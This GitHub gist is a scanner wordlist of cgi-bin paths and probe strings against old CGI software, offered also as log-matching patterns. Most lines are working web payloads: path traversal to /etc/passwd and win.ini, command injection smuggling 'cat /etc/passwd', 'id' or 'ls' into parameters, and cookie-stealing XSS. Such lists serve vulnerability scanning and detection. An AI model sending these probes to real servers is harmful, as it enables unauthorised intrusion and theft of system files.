
@giper45
Created July 22, 2024 16:14
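CGI wordlist: cgi-bin script paths and probe request strings (path traversal, command injection and XSS checks), one per line. The same strings can serve as match patterns when reviewing web-server access logs for scanner traffic.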
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/AT-admin.cgi
cgi-bin/AT-generate.cgi
cgi-bin/AnyBoard.cgi
cgi-bin/Backup/add-passwd.cgi
cgi-bin/CSMailto.cgi
cgi-bin/CSMailto/CSMailto.cgi
cgi-bin/CSNews.cgi
cgi-bin/Count.cgi
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
cgi-bin/FormMail.cgi?<script>alert(\
cgi-bin/Gozila.cgi
cgi-bin/ImageFolio/admin/admin.cgi
cgi-bin/LWGate.cgi
cgi-bin/Pbcgi.exe
cgi-bin/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
cgi-bin/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
cgi-bin/add_ftp.cgi
cgi-bin/addbanner.cgi
cgi-bin/adduser.cgi
cgi-bin/admcgi/contents.htm
cgi-bin/admcgi/scripts/Fpadmcgi.exe
cgi-bin/admin.cgi
cgi-bin/admin.cgi?list=../../../../../../../../../../etc
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
cgi-bin/adminhot.cgi
cgi-bin/adminwww.cgi
cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/aglimpse.cgi
cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/anyboard.cgi
cgi-bin/apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
cgi-bin/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
cgi-bin/architext_query.cgi
cgi-bin/astrocam.cgi
cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
cgi-bin/auction/auction.cgi?action=
cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
cgi-bin/ax-admin.cgi
cgi-bin/ax.cgi
cgi-bin/axis-cgi/buffer/command.cgi
cgi-bin/axs.cgi
cgi-bin/badmin.cgi
cgi-bin/bandwidth/index.cgi
cgi-bin/banner.cgi
cgi-bin/bannereditor.cgi
cgi-bin/bbs_forum.cgi
cgi-bin/bigconf.cgi
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
cgi-bin/bizdb1-search.cgi
cgi-bin/blog/mt-check.cgi
cgi-bin/blog/mt-load.cgi
cgi-bin/bnbform.cgi
cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
cgi-bin/boozt/admin/index.cgi?section=5&input=1
cgi-bin/bsguest.cgi?email=x;ls
cgi-bin/bslist.cgi?email=x;ls
cgi-bin/build.cgi
cgi-bin/bulk/bulk.cgi
cgi-bin/c_download.cgi
cgi-bin/cached_feed.cgi
cgi-bin/cachemgr.cgi
cgi-bin/calendar/index.cgi
cgi-bin/cartcart.cgi
cgi-bin/cartmanager.cgi
cgi-bin/cbmc/forums.cgi
cgi-bin/ccbill-local.cgi?cmd=MENU
cgi-bin/ccbill/whereami.cgi
cgi-bin/cd-cgi/sscd_suncourier.pl
cgi-bin/cgforum.cgi
cgi-bin/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/cgi-local/cgiemail-1.4/cgicso?query=AAA
cgi-bin/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/cgi-local/cgiemail-1.6/cgicso?query=AAA
cgi-bin/cgi-sys/FormMail-clone.cgi
cgi-bin/cgi-sys/addalink.cgi
cgi-bin/cgi-sys/cgiecho
cgi-bin/cgi-sys/cgiemail
cgi-bin/cgi-sys/domainredirect.cgi
cgi-bin/cgi-sys/entropybanner.cgi
cgi-bin/cgi-sys/entropysearch.cgi
cgi-bin/cgi-sys/helpdesk.cgi
cgi-bin/cgi-sys/mchat.cgi
cgi-bin/cgi-sys/randhtml.cgi
cgi-bin/cgi-sys/realhelpdesk.cgi
cgi-bin/cgi-sys/realsignup.cgi
cgi-bin/cgi-sys/scgiwrap
cgi-bin/cgi-sys/signup.cgi
cgi-bin/cgi-win/cgitest.exe
cgi-bin/cgi/cgiproc?
cgi-bin/cgis/wwwboard/wwwboard.cgi
cgi-bin/classified.cgi
cgi-bin/classifieds.cgi
cgi-bin/classifieds/classifieds.cgi
cgi-bin/classifieds/index.cgi
cgi-bin/commandit.cgi
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
cgi-bin/compatible.cgi
cgi-bin/count.cgi
cgi-bin/cp/rac/nsManager.cgi
cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csNews.cgi
cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csPassword.cgi
cgi-bin/csPassword.cgi?command=remove%20
cgi-bin/csPassword/csPassword.cgi
cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvsblame.cgi?file=<script>alert('XSS')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=<script>alert('XSS')</script>
cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
cgi-bin/day5datacopier.cgi
cgi-bin/day5datanotifier.cgi
cgi-bin/db_manager.cgi
cgi-bin/dbman/db.cgi?db=no-db
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dfire.cgi
cgi-bin/diagnose.cgi
cgi-bin/dig.cgi
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
cgi-bin/download.cgi
cgi-bin/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=.%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
cgi-bin/enter.cgi
cgi-bin/environ.cgi
cgi-bin/ez2000/ezadmin.cgi
cgi-bin/ez2000/ezboard.cgi
cgi-bin/ez2000/ezman.cgi
cgi-bin/ezadmin.cgi
cgi-bin/ezboard.cgi
cgi-bin/ezman.cgi
cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
cgi-bin/ezshopper2/loadpage.cgi
cgi-bin/ezshopper3/loadpage.cgi
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
cgi-bin/flexform.cgi
cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/fom.cgi?file=<script>alert('XSS')</script>
cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
cgi-bin/fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
cgi-bin/formmail.cgi
cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/gH.cgi
cgi-bin/gbadmin.cgi?action=change_adminpass
cgi-bin/gbadmin.cgi?action=change_automail
cgi-bin/gbadmin.cgi?action=colors
cgi-bin/gbadmin.cgi?action=setup
cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
cgi-bin/generate.cgi?content=../../../../../../../../../../etc
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../windows
cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
cgi-bin/getdoc.cgi
cgi-bin/gm-authors.cgi
cgi-bin/gm-cplog.cgi
cgi-bin/gm.cgi
cgi-bin/guestbook.cgi
cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
cgi-bin/handler.cgi
cgi-bin/hitmatic/analyse.cgi
cgi-bin/hitview.cgi
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
cgi-bin/hsx.cgi?show=../../../../../../../../../../../passwd%00
cgi-bin/html2chtml.cgi
cgi-bin/html2wml.cgi
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
cgi-bin/if/admin/nph-build.cgi
cgi-bin/ikonboard/help.cgi?
cgi-bin/imageFolio.cgi
cgi-bin/imagefolio/admin/admin.cgi
cgi-bin/infosrch.cgi
cgi-bin/journal.cgi?folder=journal.cgi%00
cgi-bin/lastlines.cgi?process
cgi-bin/lcgi/lcgitest.nlm
cgi-bin/lcgi/ndsobj.nlm
cgi-bin/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
cgi-bin/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
cgi-bin/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
cgi-bin/lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/log-reader.cgi
cgi-bin/login.cgi
cgi-bin/logit.cgi
cgi-bin/lookwho.cgi
cgi-bin/lwgate.cgi
cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
cgi-bin/maillist.cgi
cgi-bin/mailnews.cgi
cgi-bin/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
cgi-bin/manage/cgi/cgiproc
cgi-bin/mastergate/search.cgi?search=0&search_on=all
cgi-bin/megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
cgi-bin/mgrqcgi
cgi-bin/mini_logger.cgi
cgi-bin/ministats/admin.cgi
cgi-bin/mmstdod.cgi
cgi-bin/mods/apage/apage.cgi?f=file.htm.|id|
cgi-bin/moin.cgi?test
cgi-bin/mojo/mojo.cgi
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cgi?cfg=blah
cgi-bin/mt-static/mt-check.cgi
cgi-bin/mt-static/mt-load.cgi
cgi-bin/mt/mt-check.cgi
cgi-bin/mt/mt-load.cgi
cgi-bin/musicqueue.cgi
cgi-bin/myguestbook.cgi?action=view
cgi-bin/namazu.cgi
cgi-bin/nbmember.cgi?cmd=list_all_users
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
cgi-bin/netpad.cgi
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
cgi-bin/nlog-smb.cgi
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/nph-exploitscanget.cgi
cgi-bin/nph-publish.cgi
cgi-bin/nph-test-cgi
cgi-bin/officescan/cgi/cgiChkMasterPwd.exe
cgi-bin/officescan/cgi/jdkRqNotify.exe
cgi-bin/page.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pagelog.cgi
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
cgi-bin/parse_xml.cgi
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3C
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
cgi-bin/perl/samples/lancgi.pl
cgi-bin/perl/samples/volscgi.pl
cgi-bin/perlshop.cgi
cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/phf.cgi?QALIA
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
cgi-bin/photo/manage.cgi
cgi-bin/photo/protected/manage.cgi
cgi-bin/photodata/manage.cgi
cgi-bin/php-cgi
cgi-bin/php.cgi?/etc/passwd
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
cgi-bin/pollssi.cgi
cgi-bin/postcards.cgi
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../passwd
cgi-bin/ppdscgi.exe
cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
cgi-bin/profile.cgi
cgi-bin/pub/english.cgi?op=rmail
cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
cgi-bin/quikmail/nph-emumail.cgi?type=../%00
cgi-bin/quikstore.cgi
cgi-bin/quizme.cgi
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/ratlog.cgi
cgi-bin/register.cgi
cgi-bin/replicator/webpage.cgi/
cgi-bin/responder.cgi
cgi-bin/reviews/newpro.cgi
cgi-bin/robadmin.cgi
cgi-bin/robpoll.cgi
cgi-bin/rwcgi60
cgi-bin/rwcgi60/showenv
cgi-bin/sbcgi/sitebuilder.cgi
cgi-bin/scoadminreg.cgi
cgi-bin/scripts/fpadmcgi.exe
cgi-bin/search.cgi
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../etc
cgi-bin/sendform.cgi
cgi-bin/servers/link.cgi
cgi-bin/setpasswd.cgi
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
cgi-bin/shop/member_html.cgi?file=;cat%20/etc/passwd|
cgi-bin/shop/member_html.cgi?file=|cat%20/etc/passwd|
cgi-bin/shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;
cgi-bin/shop/normal_html.cgi?file=../../../../../../etc/issue%00
cgi-bin/shop/normal_html.cgi?file=;cat%20/etc/passwd|
cgi-bin/shop/normal_html.cgi?file=|cat%20/etc/passwd|
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/showcheckins.cgi?person=<script>alert('XSS')</script>
cgi-bin/showuser.cgi
cgi-bin/simplestguest.cgi
cgi-bin/simplestmail.cgi
cgi-bin/site_searcher.cgi
cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
cgi-bin/spin_client.cgi?aaaaaaaa
cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
cgi-bin/store.cgi?
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
cgi-bin/store/agora.cgi?cart_id=<script>alert('XSS')</script>
cgi-bin/store/agora.cgi?page=whatever33.html
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
cgi-bin/survey.cgi
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd
cgi-bin/technote/print.cgi
cgi-bin/test-cgi.bat
cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
cgi-bin/test-cgi.tcl
cgi-bin/test-cgi?/*
cgi-bin/test.cgi
cgi-bin/test/test.cgi
cgi-bin/testcgi.exe
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
cgi-bin/tidfinder.cgi
cgi-bin/tigvote.cgi
cgi-bin/title.cgi
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/troops.cgi
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../passwd
cgi-bin/ultraboard.cgi
cgi-bin/upload.cgi
cgi-bin/upload.cgi+
cgi-bin/urlcount.cgi?%3CIMG%20
cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
cgi-bin/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
cgi-bin/users/scripts/submit.cgi
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
cgi-bin/viralator.cgi
cgi-bin/virgil.cgi
cgi-bin/vote.cgi
cgi-bin/vpasswd.cgi
cgi-bin/way-board.cgi?db=/etc/passwd%00
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
cgi-bin/webbbs.cgi
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
cgi-bin/webif.cgi
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/webmap.cgi
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
cgi-bin/webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/whois.cgi?action=load&whois=%3Bid
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
cgi-bin/wrap.cgi
cgi-bin/wwwboard.cgi.cgi
cgi-bin/wwwboard/wwwboard.cgi
cgi-bin/zml.cgi?file=../../../../../../../../../../etc
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00